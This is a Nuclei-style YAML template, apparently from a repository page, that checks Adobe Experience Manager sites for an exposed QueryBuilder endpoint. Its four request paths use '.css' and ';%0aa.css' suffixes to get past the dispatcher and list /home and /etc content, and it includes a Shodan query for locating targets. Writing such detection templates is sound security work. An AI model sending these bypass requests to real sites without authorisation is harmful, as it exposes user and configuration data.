40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: aem-querybuilder-internal-path-read
|
|
|
|
info:
|
|
name: AEM QueryBuilder Internal Path Read
|
|
author: DhiyaneshDk
|
|
severity: medium
|
|
description: AEM QueryBuilder is vulnerable to LFI.
|
|
reference:
|
|
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
|
|
classification:
|
|
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 4
|
|
vendor: adobe
|
|
product: experience_manager
|
|
shodan-query: http.component:"Adobe Experience Manager"
|
|
tags: aem,misconfig
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
|
|
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
|
|
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
|
|
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- 'jcr:path'
|
|
- 'success'
|
|
condition: and
|
|
# digest: 4a0a00473045022100de88c468c3aeed50d91b0d21ce847e4f0f5a629ef7cbda9ae31ee002fb5e718d02207d260b9104985c42ec3cf7d4aacb580643ad6162967c86cadaf0775dc0af624b:922c64590222798bb761d5b6d8e72950 |